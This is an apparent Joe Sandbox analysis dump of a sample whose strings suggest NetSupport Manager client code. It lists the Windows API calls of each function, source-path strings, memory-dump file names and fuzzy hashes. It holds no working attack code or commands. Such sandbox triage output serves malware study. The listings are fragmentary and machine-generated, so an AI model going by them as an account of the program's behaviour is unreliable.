                                                                                    • Opcode Fuzzy Hash: 3804ad2b8b8d45a3881d6a1d8f9e7176cbf39d2a15b6b3a9b1851c2b4258d80b
                                                                                    • Instruction Fuzzy Hash: 62414F75A00F058FD724CF79CD856ABF7E1FF84219F104A3ED56A9A244EB3565418F00
                                                                                    APIs
                                                                                    • GetWindowLongA.USER32(?,000000F0), ref: 11077241
                                                                                    • CopyRect.USER32(?,00000004), ref: 1107726F
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    Strings
                                                                                    • m_hWnd, xrefs: 1107722E
                                                                                    • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11077229
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CopyErrorExitLastLongMessageProcessRectWindowwsprintf
                                                                                    • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                                    • API String ID: 2755825785-2830328467
                                                                                    • Opcode ID: 52b039dbae3ac474573174c2f07e54e0dc35dacba2b0f62a005c55ea2bccfa41
                                                                                    • Instruction ID: de278a2cd4c0b5f0839ddad857aefe36ed68345845b5ae66c69d21e7740d687e
                                                                                    • Opcode Fuzzy Hash: 52b039dbae3ac474573174c2f07e54e0dc35dacba2b0f62a005c55ea2bccfa41
                                                                                    • Instruction Fuzzy Hash: 3841A331E00A06DBCB14CE68C9C8A5EF7F1FF84344F10C569E86597644EB30E941CB58
                                                                                    APIs
                                                                                    • _memmove.LIBCMT ref: 110D1128
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorExitLastMessageProcess_memmovewsprintf
                                                                                    • String ID: ..\CTL32\NSMString.cpp$IsA()$cchLen<=0 || cchLen<=(int) _tcslen(pszStr)
                                                                                    • API String ID: 1528188558-323366856
                                                                                    • Opcode ID: 68b70f9a2bf70a58353feb4a735461465b776518e9ae676a20bb0fc5dc14d86d
                                                                                    • Instruction ID: cd45fd8f54c028a965d30ceca3f2b81ac61ec80aecbdd09916459db7febd3670
                                                                                    • Opcode Fuzzy Hash: 68b70f9a2bf70a58353feb4a735461465b776518e9ae676a20bb0fc5dc14d86d
                                                                                    • Instruction Fuzzy Hash: AE21263EB003476BDB11DE69EC50F9BB7D99FC528CB108498F98887301EE72F4058294
                                                                                    APIs
                                                                                    • GetProcAddress.KERNEL32(00000000,0000000E), ref: 1115FFD1
                                                                                      • Part of subcall function 1115FE60: RegOpenKeyExA.ADVAPI32(80000000,CLSID\{ADB880A6-D8FF-11CF-9377-00AA003B7A11}\InprocServer32,00000000,00020019,?,?), ref: 1115FE98
                                                                                      • Part of subcall function 1115FE60: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,?,?,?), ref: 1115FED9
                                                                                      • Part of subcall function 1115FE60: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104), ref: 1115FEFD
                                                                                      • Part of subcall function 1115FE60: RegCloseKey.ADVAPI32(?), ref: 1115FF2A
                                                                                    • LoadLibraryA.KERNEL32(?,?,?,?,?), ref: 1115FF93
                                                                                    • LoadLibraryA.KERNEL32(hhctrl.ocx,?,?,?,?), ref: 1115FFA9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: LibraryLoad$AddressCloseEnvironmentExpandOpenProcQueryStringsValue
                                                                                    • String ID: hhctrl.ocx
                                                                                    • API String ID: 1060647816-2298675154
                                                                                    • Opcode ID: a3853af9b5ec3e1502db0b4bafb9ef45656db84a0f437c905b28bfddd73cca6c
                                                                                    • Instruction ID: 21cf1aba31526e8ead5fc6aa4b71c903af58d6e9e090c4be98d1d971a6eb0305
                                                                                    • Opcode Fuzzy Hash: a3853af9b5ec3e1502db0b4bafb9ef45656db84a0f437c905b28bfddd73cca6c
                                                                                    • Instruction Fuzzy Hash: E911663260826B9BDB84DF65C994BDAF7A8EB4B758B41003FE521D3544EB70D844CB92
                                                                                    APIs
                                                                                    • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 110B91EF
                                                                                    • MoveWindow.USER32(8D111939,?,?,?,?,00000001,?,?,?,?,?,?,?,?,?,110BA3F5), ref: 110B9228
                                                                                    • SetTimer.USER32(8D111939,0000050D,000007D0,00000000), ref: 110B9260
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: InfoMoveParametersSystemTimerWindow
                                                                                    • String ID: Max
                                                                                    • API String ID: 1521622399-2772132969
                                                                                    • Opcode ID: dd270aeb1ce9957f205ba7153b0c8123e734f44cde7feed230d9f6d1d20fe2b6
                                                                                    • Instruction ID: cbc035c590c08491bc6b7e29ca505f880cfdd662cf6ac53e8412c44867f4f71a
                                                                                    • Opcode Fuzzy Hash: dd270aeb1ce9957f205ba7153b0c8123e734f44cde7feed230d9f6d1d20fe2b6
                                                                                    • Instruction Fuzzy Hash: EA2130B5A40309AFD714CFA4C885FAFF7B8FB48714F10452EE95597380CA70A941CBA0
                                                                                    APIs
                                                                                    • IsWindow.USER32(?), ref: 110ED118
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorExitLastMessageProcessWindowwsprintf
                                                                                    • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)$lpNmHdr!=0
                                                                                    • API String ID: 2577986331-1331251348
                                                                                    • Opcode ID: 0130043435edc3a22456987cf30c2144a781c09618dcf41b74824cb74998b838
                                                                                    • Instruction ID: a6e56e2616b3f757a7bedb7841b960acd04ffc41865bfa7298ab7df9715bb4c1
                                                                                    • Opcode Fuzzy Hash: 0130043435edc3a22456987cf30c2144a781c09618dcf41b74824cb74998b838
                                                                                    • Instruction Fuzzy Hash: 85F02735F02126BBC6228E579C09F8EB378CF90BACF0200A4F81C26140E734B51082D5
                                                                                    APIs
                                                                                    • _free.LIBCMT ref: 11081417
                                                                                      • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                      • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                      • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                      • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorExitLastMessageProcess_freewsprintf
                                                                                    • String ID: ..\CTL32\DataStream.cpp$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h
                                                                                    • API String ID: 2441568934-1875806619
                                                                                    • Opcode ID: af1373b32a9bb4e1f8f26d5d02c3c702896290850c3687507677e6fe67b99708
                                                                                    • Instruction ID: 32575625ee732fca108261b890e952c9fd6c17214e61566243eaf6e55242290c
                                                                                    • Opcode Fuzzy Hash: af1373b32a9bb4e1f8f26d5d02c3c702896290850c3687507677e6fe67b99708
                                                                                    • Instruction Fuzzy Hash: D1F0A0BCE086651BD730DE99BC00FCAB7D05F1434CF050498EA8627682DBBA7549C2E6
                                                                                    APIs
                                                                                    • RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1106117C
                                                                                    • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 110611D4
                                                                                    • RegEnumValueA.ADVAPI32(?,00000001,?,00000080,00000000,?,?,00000480), ref: 110612C3
                                                                                    • RegCloseKey.ADVAPI32(?), ref: 110612D4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: EnumValue$CloseOpen
                                                                                    • String ID:
                                                                                    • API String ID: 3785232357-0
                                                                                    • Opcode ID: 385e5134d3de21a01a15670ba88f4417c14cd2c8775287df043cdc8206fa1483
                                                                                    • Instruction ID: e119b506798adee895546c353bca4cd72f80153627c59e78ac85c5ed933e93b3
                                                                                    • Opcode Fuzzy Hash: 385e5134d3de21a01a15670ba88f4417c14cd2c8775287df043cdc8206fa1483
                                                                                    • Instruction Fuzzy Hash: 14412CB190061E9EDB20CB54CC84FDBBBBDAB89305F0045D9E649D7141EA70AA98CFA0
                                                                                    APIs
                                                                                    • CreateThread.KERNEL32(00000000,00001000,11027030,00000000,00000000,111ED468), ref: 110291F3
                                                                                    • Sleep.KERNEL32(00000032,?,1102A9A3,00000000,?,00000000,000001E8,Bridge,LoadOnStartup,00000000,00000000), ref: 11029212
                                                                                    • PostThreadMessageA.USER32(00000000,00000500,00000000,00000000), ref: 11029234
                                                                                    • Sleep.KERNEL32(00000032,?,1102A9A3,00000000,?,00000000,000001E8,Bridge,LoadOnStartup,00000000,00000000), ref: 1102923C
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: SleepThread$CreateMessagePost
                                                                                    • String ID:
                                                                                    • API String ID: 3347742789-0
                                                                                    • Opcode ID: 7f55f862f45cabdbc49d2828a68d0c06d0eeafcbd3f137c249c1e94448b790d1
                                                                                    • Instruction ID: 6c329cfe7713c70c74540dd837a6755ec0a493dd99a0e0f492d5b7c5eaff94cf
                                                                                    • Opcode Fuzzy Hash: 7f55f862f45cabdbc49d2828a68d0c06d0eeafcbd3f137c249c1e94448b790d1
                                                                                    • Instruction Fuzzy Hash: E831D476D42230ABD602DBDCCC80FAABBA8A755758F914134F9395B6C8D6717805CBD0
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(0000002C,420B7E12,?,?,00000000,00000000,?,Function_00182078,000000FF,?,1103D500,?,?,?,00000000,420B7E12), ref: 110B325F
                                                                                    • LeaveCriticalSection.KERNEL32(0000002C,?,1103D500,?,?,?,00000000,420B7E12,?,?,00000000,?,00000015,00000000), ref: 110B329F
                                                                                    • SetEvent.KERNEL32(?), ref: 110B331A
                                                                                    • LeaveCriticalSection.KERNEL32(0000002C), ref: 110B3321
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$Leave$EnterEvent
                                                                                    • String ID:
                                                                                    • API String ID: 3394196147-0
                                                                                    • Opcode ID: fd4f52dacf6346c68deca50a419aba338554c765379c0af81f02942a775e7cd5
                                                                                    • Instruction ID: 1c2cd706bfc580d94f6c8d94d17799be7df3d247d13d912ddb644fcd1bc25a9e
                                                                                    • Opcode Fuzzy Hash: fd4f52dacf6346c68deca50a419aba338554c765379c0af81f02942a775e7cd5
                                                                                    • Instruction Fuzzy Hash: FC310575A04B059FD315CF69C884B9AFBE4FB4C314F10866EE85AC7750EB34A854CB90
                                                                                    APIs
                                                                                    • EnterCriticalSection.KERNEL32(0000002C,420B7E12,?,?,00000000,00000000,00000000,Function_00182078,000000FF,?,1103D571,?,420B7E12,?,?,00000000), ref: 110B336F
                                                                                    • LeaveCriticalSection.KERNEL32(0000002C,?,1103D571,?,420B7E12,?,?,00000000,?,00000015,00000000), ref: 110B338E
                                                                                    • SetEvent.KERNEL32(?,?,?,1103D571,?,420B7E12,?,?,00000000,?,00000015,00000000), ref: 110B33D4
                                                                                    • LeaveCriticalSection.KERNEL32(0000002C,?,?,1103D571,?,420B7E12,?,?,00000000,?,00000015,00000000), ref: 110B33DB
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CriticalSection$Leave$EnterEvent
                                                                                    • String ID:
                                                                                    • API String ID: 3394196147-0
                                                                                    • Opcode ID: e042a88a3925eb2d51153c2a6544309ecf0762f38e12571a01f1b65a48f17828
                                                                                    • Instruction ID: 2836c68be1e173ca97a40bbc94208784cbdba460b006acea4806f33579668287
                                                                                    • Opcode Fuzzy Hash: e042a88a3925eb2d51153c2a6544309ecf0762f38e12571a01f1b65a48f17828
                                                                                    • Instruction Fuzzy Hash: 6221DF76A087089FD315CFA8D884B9AF7E8FB4C715F008A2EE816C7640DB79B404CB94
                                                                                    APIs
                                                                                    • LoadCursorA.USER32(00000000,00007F00), ref: 11113252
                                                                                    • SetCursor.USER32(00000000,?,?,11120606,00000000,00000000,11124B99,00000000,00000000,00000000,00000000,View,BlankAll,00000000,00000000,00000004), ref: 11113259
                                                                                    • DestroyCursor.USER32(?), ref: 11113270
                                                                                    • DestroyCursor.USER32(?), ref: 1111327D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
